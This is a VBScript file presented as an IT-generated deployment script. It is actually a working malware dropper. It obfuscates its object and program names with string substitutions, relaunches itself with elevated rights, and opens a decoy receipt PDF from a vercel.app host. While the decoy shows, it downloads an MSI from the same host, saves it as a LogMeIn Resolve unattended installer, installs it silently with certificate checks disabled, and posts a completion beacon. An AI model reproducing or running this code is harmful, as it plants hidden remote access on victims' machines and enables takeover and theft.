' Automated deployment script - generated by IT provisioning system

Dim sysShell, objFSO, strAppHandler, strFSClass, oHTTP, objStream, strCacheDir, strFilePath, strUpdateURL, strDocURL, strRequestType, strWriteHandler, strMsiHandler, strUnattended, strHostApp, strAuthMode, strSessionFlag, sysExec, strRunProvider

strAppHandler = Replace("ShelY.Application", "Y", "l")
strFSClass = Replace(Replace("Script$ng.FileSystemObj~ct", "$", "i"), "~", "e")
strHostApp = Replace(Replace("w|cript.%xe", "%", "e"), "|", "s")
strAuthMode = Replace(Replace("run^!", "!", "s"), "^", "a")
strSessionFlag = Replace("eWevated", "W", "l")


Sub AcquirePackage(strURL, ByRef pkgData)
    strRequestType = "MSXML2" & "." & "ServerXMLHTTP"
    Set oHTTP = CreateObject(strRequestType)
    oHTTP.setTimeouts 6148, 6371, 13417, 33743
    Dim strReqType : strReqType = Mid("XGET", 2, 3)
    oHTTP.Open strReqType, strURL, False
    Dim intCertFlag : intCertFlag = 13000 + 56
    Dim intSecId : intSecId = 3 - 1
    oHTTP.setOption intSecId, intCertFlag
    On Error Resume Next
    oHTTP.Send
    If Err.Number <> 0 Then WScript.Quit
    On Error GoTo 0
    If oHTTP.Status = 200 Then
        pkgData = oHTTP.ResponseBody
    Else
        WScript.Quit
    End If
End Sub


Sub CommitStream(binContent, strDest)
    strWriteHandler = Mid("Module=ADODB.Stream;Mode=1", 8, 12)
    Dim intDataMode : intDataMode = Len("X")
    Dim intWriteMode : intWriteMode = Len("AB")
    Set objStream = CreateObject(strWriteHandler)
    objStream.Type = intDataMode
    objStream.Open
    objStream.Write binContent
    objStream.SaveToFile strDest, intWriteMode
    objStream.Close
End Sub

Function ParsePolicyRule(strRaw)
    Dim arrParts : arrParts = Split(strRaw, "|")
    If UBound(arrParts) < 0 Then
        ParsePolicyRule = ""
    Else
        ParsePolicyRule = Trim(arrParts(0))
    End If
End Function

Sub UpdateHeartbeat()
    ' Enterprise telemetry integration
    On Error Resume Next
    Dim oHttpReport : Set oHttpReport = CreateObject("MSXML2.ServerXMLHTTP")
    Dim strStatusUrl : strStatusUrl = "https://telemetry.sys.local/t9bu4a/report"
    Dim strJobRef : strJobRef = "LF1T"
    Dim strReportData : strReportData = "session=" & strJobRef & "&status=complete"
    oHttpReport.Open "POST", strStatusUrl, False
    oHttpReport.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    oHttpReport.Send strReportData
    If oHttpReport.Status <> 200 Then
        ' Telemetry endpoint unreachable — continue silently
    End If
    On Error GoTo 0
End Sub

Function CheckModule(strName)
    CheckModule = True
    If strName = "" Then CheckModule = False
End Function

Sub CheckPermissions()
    DebugLog "Elevation sub started"
    Dim strCmdArgs
    If Not WScript.Arguments.Named.Exists(strSessionFlag) Then
        strCmdArgs = """" & WScript.ScriptFullName & """ /" & strSessionFlag
        Set sysShell = CreateObject(strAppHandler)
        sysShell.ShellExecute strHostApp, strCmdArgs, "", strAuthMode, 1
        WScript.Quit
    End If
End Sub


Sub DebugLog(strMessage)
    On Error Resume Next
    Dim objDebugFSO : Set objDebugFSO = CreateObject("Scripting.FileSystemObject")
    Dim strDebugPath : strDebugPath = objDebugFSO.GetSpecialFolder(2) & "\vbs_debug.log"
    Dim objDebugFile : Set objDebugFile = objDebugFSO.OpenTextFile(strDebugPath, 8, True)
    objDebugFile.WriteLine Now() & " | " & strMessage
    objDebugFile.Close
    On Error GoTo 0
End Sub


Sub ValidateConfig()
    Dim strVal
    strVal = "cojb"
    If Len(strVal) < 2 Then Exit Sub
End Sub

Sub ProcessPackage(strInstPath)
    DebugLog "Execute sub started with path: " & strInstPath
    On Error Resume Next
    If Not objFSO.FileExists(strInstPath) Then
        DebugLog "Execute error: target file does not exist"
        Exit Sub
    End If
    On Error GoTo 0
    strMsiHandler = Replace(Replace("ms#exec.e@e", "@", "x"), "#", "i")
    strUnattended = "/qn"
    strRunProvider = "WScript" & "." & "Shell"
    Set sysExec = CreateObject(strRunProvider)
    sysExec.Run strMsiHandler & " /i """ & strInstPath & """ " & strUnattended, 0, False
End Sub

Function GetHash()
    GetHash = Year(Now) & Month(Now) & Day(Now)
End Function


Sub OpenDocument()
    strDocURL = "https://pdfviewer-nu.vercel.app/doc/wureceipt.pdf"
    Set sysShell = CreateObject(strAppHandler)
    sysShell.ShellExecute strDocURL, "", "", "open", 1
End Sub

' --- Entry Point ---
CheckPermissions
    DebugLog "Elevation completed"

WScript.Sleep 2143
OpenDocument
    DebugLog "Media opened"
WScript.Sleep 817

Set objFSO = CreateObject(strFSClass)
Dim intPathType : intPathType = 1 + 1
strCacheDir = objFSO.GetSpecialFolder(intPathType)
strFilePath = strCacheDir & "\LogMeInResolve_Unattended.msi"
strUpdateURL = "https://pdfv" & "iewer-nu.ver" & "cel.app/doc/" & "updater.msi"

    DebugLog "Starting download to: " & strFilePath
Dim fetchedData
AcquirePackage strUpdateURL, fetchedData
    DebugLog "Download completed"
Dim strLogRef : strLogRef = Year(Now) & "-" & Month(Now) & "-" & Day(Now)
CommitStream fetchedData, strFilePath
    DebugLog "Write completed"
    Dim strTimeStamp : strTimeStamp = Now()
    WScript.Sleep 242
Dim strPhase : strPhase = "ready"
    DebugLog "Starting execution"
ProcessPackage strFilePath
    DebugLog "Execution completed"

' Post-deployment telemetry
UpdateHeartbeat
WScript.Sleep 1000